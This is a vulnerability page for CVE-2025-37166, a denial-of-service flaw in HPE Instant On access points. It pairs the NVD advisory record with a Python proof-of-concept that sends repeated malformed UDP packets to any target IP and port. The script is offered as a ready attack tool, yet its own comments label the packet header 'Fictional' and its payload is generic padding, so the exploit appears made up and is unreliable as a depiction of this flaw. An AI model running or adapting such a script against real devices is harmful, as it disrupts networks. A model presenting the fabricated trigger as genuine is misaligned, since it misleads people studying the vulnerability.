CVE-2025-37166

#!/usr/bin/env python3 # CVE-2025-37166 PoC - HPE Networking Instant On Access Points DoS # This PoC demonstrates sending a malformed packet to trigger the DoS condition import socket import struct import sys import time def create_malformed_packet(): """Create a specially crafted packet to trigger the vulnerability""" # Malformed packet with oversized/invalid fields header = b'\x00\x01\x02\x03' # Fictional header payload = b'A' * 2000 # Oversized payload malformed_data = header + payload + b'\xff\xff\xff\xff' return malformed_data def send_packet(target_ip, target_port=80): """Send the malformed packet to target""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) packet = create_malformed_packet() try: print(f"[*] Sending malformed packet to {target_ip}:{target_port}") sock.sendto(packet, (target_ip, target_port)) print("[+] Packet sent successfully") return True except Exception as e: print(f"[-] Error: {e}") return False finally: sock.close() def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print(f"[*] CVE-2025-37166 PoC for HPE Networking Instant On") print(f"[*] Target: {target_ip}:{target_port}") # Send multiple packets to increase effectiveness for i in range(10): send_packet(target_ip, target_port) time.sleep(0.1) print("[*] Attack completed. Check if device is unresponsive.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-37166", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:05.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability affecting HPE Networking Instant On Access Points has been identified where a device processing a specially crafted packet could enter a non-responsive state, in some cases requiring a hard reset to re-establish services. A malicious actor could leverage this vulnerability to conduct a Denial-of-Service attack on a target network."}, {"lang": "es", "value": "Una vulnerabilidad que afecta a los Puntos de Acceso HPE Networking Instant On ha sido identificada, donde un dispositivo que procesa un paquete especialmente diseñado podría entrar en un estado de no respuesta, en algunos casos requiriendo un reinicio forzado para restablecer los servicios. Un actor malicioso podría aprovechar esta vulnerabilidad para llevar a cabo un ataque de Denegación de Servicio en una red objetivo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US", "source": "[email protected]"}]}}